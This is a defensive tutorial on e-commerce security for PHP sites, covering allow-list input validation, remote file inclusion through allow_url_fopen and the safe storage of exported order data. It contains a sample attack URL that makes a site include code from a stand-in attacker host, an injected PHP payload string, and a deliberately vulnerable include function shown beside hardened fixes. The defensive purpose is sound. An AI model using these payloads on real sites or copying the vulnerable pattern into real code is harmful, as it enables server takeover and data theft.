Security needs to be a major consideration when developing an e-commerce website or e-commerce software, and a developer needs to be aware of the relevant issues when designing a site. With e-commerce becoming more commonplace, the number of attacks is increasing. Paranoia is a healthy thing for e-commerce site developers: we need to keep up to date with security issues and keep our eyes and ears open. The loopholes described below are serious, but where they are present they are easily fixed.
Listed below are some security considerations to be included when developing a site. This article does not cover e-shoplifting; please see my separate article on this.
User input - every input, whether it is a quantity, a product search, a name, etc., needs to be validated for suspicious characters. If this is not done, an attacker can submit input containing PHP tags such as "?>" and "<?php"; if that input is ever written to a file the application later includes, or passed to eval(), the attacker's PHP code runs on your server.
It is far safer to allow only the letters a-z (capitals included) and the digits 0-9 and nothing else than to keep a list of every character that should not be there: an allow list cannot be defeated by a character you forgot. The validation script needs to check every character, from the first to the last (in PHP a single anchored regular expression does this). It must be done in server-side validation, not JavaScript: a client-side check is bypassed by simply sending the request directly, so server-side input validation is essential to keep out unwanted characters. Where a field genuinely needs more (a name with a space or apostrophe), widen the allow list for that field deliberately rather than abandoning the approach.
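Here is what such an allow-list check looks like in PHP, as an added example that is not part of the original article. It validates a product code and a quantity the way the paragraph above prescribes, using one anchored regular expression per field instead of a hand-written character loop; the field names (sku, qty), the length and range limits, and the sample inputs standing in for $_POST are assumptions made for illustration.

```php
<?php
// Added example (not from the original article): server-side allow-list
// validation. Field names, limits and sample inputs are assumed.

// Accept only A-Z, a-z, 0-9, of bounded length. The \A and \z anchors
// matter: without them preg_match would accept "abc<?php" or a value
// with a trailing newline.
function is_alnum_token(string $value, int $max_len = 64): bool
{
    return $value !== ''
        && strlen($value) <= $max_len
        && preg_match('/\A[A-Za-z0-9]+\z/', $value) === 1;
}

// A quantity must be a positive integer in a sane range, not merely
// "something numeric": "0", "-1", "1e3" and "999999999" are all rejected.
function parse_quantity(string $value, int $max = 1000): ?int
{
    if (preg_match('/\A[1-9][0-9]{0,6}\z/', $value) !== 1) {
        return null;
    }
    $n = (int) $value;
    return $n <= $max ? $n : null;
}

// Validate a whole request; returns the clean values plus the names of
// any fields that failed. Nothing from $input is used until it passed.
function validate_order_form(array $input): array
{
    $errors = [];
    $clean  = [];

    $sku = (string) ($input['sku'] ?? '');
    if (is_alnum_token($sku, 32)) {
        $clean['sku'] = $sku;
    } else {
        $errors[] = 'sku';
    }

    $qty = parse_quantity((string) ($input['qty'] ?? ''));
    if ($qty === null) {
        $errors[] = 'qty';
    } else {
        $clean['qty'] = $qty;
    }

    return ['clean' => $clean, 'errors' => $errors];
}

// Constructed sample inputs standing in for $_POST.
$good = ['sku' => 'AB123', 'qty' => '2'];
$bad  = ['sku' => 'AB123?><?php system("id");', 'qty' => '-1'];

var_dump(validate_order_form($good));
var_dump(validate_order_form($bad));
```

The second request is rejected on both fields: the sku contains characters outside the allow list and the quantity is not a positive integer. Validation of this kind limits what reaches your code; it does not replace escaping or parameterisation at the point where the value is used.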
There is another major risk when executing PHP code. PHP has a setting called allow_url_fopen which lets a PHP script open remote URLs as if they were local files. This setting should be turned off unless absolutely necessary. (PHP 5.2 and later also have a separate setting, allow_url_include, which controls whether include and require may load a URL; it should be off as well.)
Imagine you have PHP scripts for fixed headers and footers, and your pages are reached by typing http://www.mysite.com/index.php?page=page2, with index.php including whatever file the page parameter names. All it takes is a malicious user to request "http://www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt", with some PHP code in the file "hacker.txt", and that code runs on your server. Anything could happen: PHP files read or deleted, vital information stolen.
If you are not sure whether this setting is on or off, copy the following PHP code into a text file and upload it to your web server:
<?php
phpinfo();
?>
When you access the script on your web server, you will find allow_url_fopen listed in the configuration section of the output (under Core).
An ordinary visitor cannot see the value of this setting; only someone able to upload a script to the server can check it this way. Delete the phpinfo() file as soon as you have looked, because it reveals your full server configuration to anyone who finds it.
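The following added example (not code from the original article) puts the vulnerable include pattern described above beside an allow-listed replacement, and reads the two relevant php.ini settings with ini_get() so the check can be scripted instead of read off a phpinfo() page. The page file names under pages/ and the header/footer file names are assumptions.

```php
<?php
// Added example, not from the original article. File names are assumed.

// VULNERABLE (do not deploy): whatever arrives in ?page= is included.
// With allow_url_fopen / allow_url_include on, ?page=http://evil/x.txt
// fetches and executes remote PHP; even with both off, a value such as
// ../../etc/passwd still reads local files through include().
function render_page_vulnerable(): void
{
    include $_GET['page'];
}

// HARDENED: the request selects a key, never a path. Unknown keys get a
// 404, so nothing user-controlled ever reaches include().
const PAGES = [
    'home'    => 'pages/home.php',
    'page2'   => 'pages/page2.php',
    'contact' => 'pages/contact.php',
];

function resolve_page(string $requested): ?string
{
    return PAGES[$requested] ?? null;
}

function render_page_hardened(): void
{
    $file = resolve_page((string) ($_GET['page'] ?? 'home'));
    if ($file === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    include __DIR__ . '/header.php';
    include __DIR__ . '/' . $file;
    include __DIR__ . '/footer.php';
}

// Self-check of the two settings that control remote inclusion. Since
// PHP 5.2, include/require of URLs is governed by allow_url_include;
// allow_url_fopen covers fopen()/file_get_contents() on URLs. ini_get()
// returns "" or "0" for a boolean directive that is off, and false if
// the directive does not exist, all of which filter_var maps to false.
function remote_file_settings(): array
{
    return [
        'allow_url_fopen'   => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
        'allow_url_include' => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
    ];
}

foreach (remote_file_settings() as $name => $on) {
    echo $name, ': ', $on ? 'ON  (set to Off in php.ini)' : 'off', PHP_EOL;
}
```

Run the script from the command line or the browser to see both settings; then, as with phpinfo(), remove it from the server. The hardened render function is the real fix: turning the settings off blocks remote inclusion, but only the allow list stops the parameter from naming a local file.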
Be careful with exported data such as orders or products in CSV and MySQL dump files. A problem arises when this data is exported by a script and kept on the web server under a predictable file name, e.g. http://www.mysite.com/admin/output_tables.csv, in a directory that is publicly accessible. All it takes is an attacker to find this file name on the e-commerce software's demo website and then look for the same file name on a real site. There are two ways to close this loophole: first, put the output file in a password-protected directory (or, better still, outside the web root altogether); second, present the data inside an HTML textarea form element on a script in the protected admin area, so the store owner can copy the information out of the textarea and paste it into a new file on their own computer.
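As an added example, not from the original article, the following download script implements the first option in code: the export lives outside the document root, so no URL reaches it directly, and the script hands it out only to a logged-in administrator. The export directory, the is_admin session flag and the list of export files are assumptions.

```php
<?php
// Added example, not from the original article: serving an export only to
// an authenticated admin, from a file stored outside the web root.
// EXPORT_DIR, the session flag and the file list are assumed.

session_start();

// Exports live outside the document root, so a guessed URL such as
// /admin/output_tables.csv finds nothing.
const EXPORT_DIR = '/var/www/private/exports';

// Explicit list of files this script is willing to hand out; the request
// names a key, never a path, so ../ tricks have nothing to work on.
const EXPORTS = [
    'orders'   => 'orders.csv',
    'products' => 'products.csv',
];

function require_admin(): void
{
    if (empty($_SESSION['is_admin'])) {
        http_response_code(403);
        exit('Forbidden');
    }
}

// Map a request key to a real path; refuse anything not in the list.
function export_path(string $key): ?string
{
    if (!array_key_exists($key, EXPORTS)) {
        return null;
    }
    $path = EXPORT_DIR . '/' . EXPORTS[$key];
    return is_file($path) ? $path : null;
}

function send_export(string $key): void
{
    require_admin();
    $path = export_path($key);
    if ($path === null) {
        http_response_code(404);
        exit('No such export');
    }
    header('Content-Type: text/csv');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Cache-Control: no-store');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

send_export((string) ($_GET['file'] ?? ''));
```

The script that produces the export should write to EXPORT_DIR as well; once no copy of the data sits under the document root, the demo-site trick in the paragraph above yields nothing, whether or not the attacker knows the file name.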
Article: "E-Commerce Security - Plugging the Security Holes"